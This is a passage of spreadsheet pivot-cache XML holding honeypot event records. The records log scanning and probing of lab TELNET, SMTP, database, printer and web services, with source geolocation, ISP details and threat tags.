    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:8551"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="877"/>
    <x v="877"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T01:16:01"/>
    <d v="2025-04-23T21:56:27"/>
    <d v="2025-04-25T01:16:01"/>
    <n v="115"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Credential Stuffing&amp;&amp;Email Spoofing"/>
    <s v="high"/>
    <s v="SMA-LAB_SMTP_HC1"/>
    <s v="25"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="HE"/>
    <s v="Hesse"/>
    <s v="Regierungsbezirk Darmstadt"/>
    <s v="Frankfurt am Main"/>
    <s v="2925533"/>
    <s v="60313"/>
    <s v="50.1109"/>
    <s v="8.68213"/>
    <s v="401616"/>
    <s v="PRV8 Network LLC"/>
    <s v="PRV8 Network LLC"/>
    <s v="business"/>
    <s v="PRV8 Network LLC"/>
    <s v="2025-04-10"/>
    <s v="PNL"/>
    <s v="2025-04-10"/>
    <s v="connection"/>
    <s v="{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1789:6451"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="An unknown entity attempted to send an email by initiating a connection with the monitored server, but it was immediately disconnected after sending the QUIT command. The lack of any actual mail being sent and the abrupt disconnection suggests suspicious behavior. This could indicate reconnaissance or probing for potential vulnerabilities in the system. &amp;&amp; The user attempted to disconnect from an SMTP service, but the request was made without any actual mail being sent or received, which could be a probing or reconnaissance attempt. This action may indicate someone trying to identify if a specific service is running and accessible on the network. The lack of data suggests it might not be a legitimate disconnection attempt."/>
    <s v="Port Scan &amp;&amp; Port Scan"/>
  </r>
  <r>
    <x v="878"/>
    <x v="878"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T01:15:50"/>
    <d v="2025-04-23T20:26:53"/>
    <d v="2025-04-25T01:15:50"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="47"/>
    <s v="Gyeongsangbuk-do"/>
    <s v="Pohang-si"/>
    <s v="Pohang-si (Jangseong-dong)"/>
    <s v="1839068"/>
    <s v="NA"/>
    <s v="36.0784"/>
    <s v="129.379"/>
    <s v="7623"/>
    <s v="Gyeongbuk Cable TV"/>
    <s v="HYUNDAI COMMUNICATIONS &amp; NETWORK"/>
    <s v="business"/>
    <s v="HYUNDAI HCN Kyongbuk Systems Co.Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6f76:7287"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="879"/>
    <x v="879"/>
    <s v="NA&amp;&amp;114-33-56-1.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-25T00:10:59"/>
    <d v="2023-11-24T07:10:11"/>
    <d v="2025-04-25T00:10:59"/>
    <n v="199"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;8112&amp;&amp;44088&amp;&amp;23&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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:3801"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="880"/>
    <x v="880"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T00:10:48"/>
    <d v="2024-04-01T11:13:00"/>
    <d v="2025-04-25T00:10:48"/>
    <n v="49"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_SNMP_H47&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;161&amp;&amp;61754&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Watthana"/>
    <s v="Vadhana"/>
    <s v="7027003"/>
    <s v="NA"/>
    <s v="13.729800000000001"/>
    <s v="100.585"/>
    <s v="135034"/>
    <s v="Planet Communications Asia Public Company Limited"/>
    <s v="Planet Communications Asia Public Company Limited"/>
    <s v="residential"/>
    <s v="Planet Communications Asia Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67ce:cd36"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="881"/>
    <x v="881"/>
    <s v="prod-boron-us-west-30.li.binaryedge.ninja&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-25T00:10:32"/>
    <d v="2024-03-08T01:02:00"/>
    <d v="2025-04-25T00:10:32"/>
    <n v="630"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H19&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_PJL_H22&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_FTP_H2&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_IMAP_H17"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;445&amp;&amp;5900&amp;&amp;80&amp;&amp;9100&amp;&amp;64646&amp;&amp;6379&amp;&amp;21&amp;&amp;3306&amp;&amp;3389&amp;&amp;1080&amp;&amp;143&amp;&amp;631&amp;&amp;NA&amp;&amp;443"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Alameda"/>
    <s v="Fremont"/>
    <s v="5350734"/>
    <s v="94536"/>
    <s v="37.5485"/>
    <s v="-121.989"/>
    <s v="63949"/>
    <s v="Akamai Technologies, Inc."/>
    <s v="Akamai Technologies, Inc."/>
    <s v="hosting"/>
    <s v="Linode"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;query&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '194.233.76.135:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://194.233.76.135:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '144.126.148.5:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://144.126.148.5:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '91.194.11.82', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.63.23:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.63.23:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36', 'method': 'GET', 'uri': '/RDWeb/Pages/en-US/login.aspx'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.63.23:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36', 'method': 'GET', 'uri': '/RDWeb'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.63.23:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36', 'method': 'GET', 'uri': '/Remote'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d21:21e6"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="882"/>
    <x v="882"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T23:11:25"/>
    <d v="2024-09-09T04:19:00"/>
    <d v="2025-04-24T23:11:25"/>
    <n v="84"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;39737&amp;&amp;19488&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2012-04-10"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:25e5:ed2b"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="883"/>
    <x v="883"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T22:41:05"/>
    <d v="2024-12-01T23:05:38"/>
    <d v="2025-04-24T22:41:05"/>
    <n v="22"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="NA"/>
    <s v="Seoul (Toegye-ro)"/>
    <s v="1835848"/>
    <s v="NA"/>
    <s v="37.5614"/>
    <s v="126.996"/>
    <s v="17849"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="residential"/>
    <s v="TBROAD Ginam"/>
    <s v="2007-08-07"/>
    <s v="broadNnet"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:757b:f555"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="884"/>
    <x v="884"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T22:40:23"/>
    <d v="2024-03-19T23:17:03"/>
    <d v="2025-04-24T22:40:23"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="22&amp;&amp;30128&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="23"/>
    <s v="Tehran"/>
    <s v="Shahrestān-e Tehrān"/>
    <s v="Tehran"/>
    <s v="112931"/>
    <s v="NA"/>
    <s v="35.7282"/>
    <s v="51.4259"/>
    <s v="43754"/>
    <s v="Asiatech Data Transmission company"/>
    <s v="Asiatech Data Transmission company"/>
    <s v="business"/>
    <s v="Asiatech Data Transmission Co."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="None&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6d7a:ef5c"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="885"/>
    <x v="885"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T22:22:53"/>
    <d v="2025-04-07T11:08:21"/>
    <d v="2025-04-24T22:22:53"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e9:85c4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="886"/>
    <x v="886"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T21:38:12"/>
    <d v="2025-04-24T10:18:28"/>
    <d v="2025-04-24T21:38:12"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-SouthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e9:ebc1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="887"/>
    <x v="887"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T21:27:30"/>
    <d v="2024-05-04T06:29:00"/>
    <d v="2025-04-24T21:27:30"/>
    <n v="25"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="33038&amp;&amp;1433&amp;&amp;3306"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="18403"/>
    <s v="FPT Telecom Company"/>
    <s v="FPT Telecom Company"/>
    <s v="business"/>
    <s v="Vietnam Internet Network Information Center"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None&amp;&amp;connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3aba:20a4"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="888"/>
    <x v="888"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T21:27:01"/>
    <d v="2024-07-12T08:33:00"/>
    <d v="2025-04-24T21:27:01"/>
    <n v="69"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;25047&amp;&amp;32106&amp;&amp;1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Trivandrum"/>
    <s v="Thiruvananthapuram (Technopark Campus)"/>
    <s v="1254163"/>
    <s v="695034"/>
    <s v="8.5581"/>
    <s v="76.8816"/>
    <s v="17465"/>
    <s v="Asianet Satellite Communications Pvt Ltd"/>
    <s v="Asianet Satellite Communications Pvt Ltd"/>
    <s v="residential"/>
    <s v="Asianet Satellite Communications Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca58:e99f"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="889"/>
    <x v="889"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T21:26:47"/>
    <d v="2025-04-17T09:49:15"/>
    <d v="2025-04-24T21:26:47"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="10"/>
    <s v="Isfahan"/>
    <s v="Isfahan"/>
    <s v="Isfahan"/>
    <s v="418863"/>
    <s v="NA"/>
    <s v="32.6554"/>
    <s v="51.6737"/>
    <s v="58224"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="Iran Telecommunication Company PJS"/>
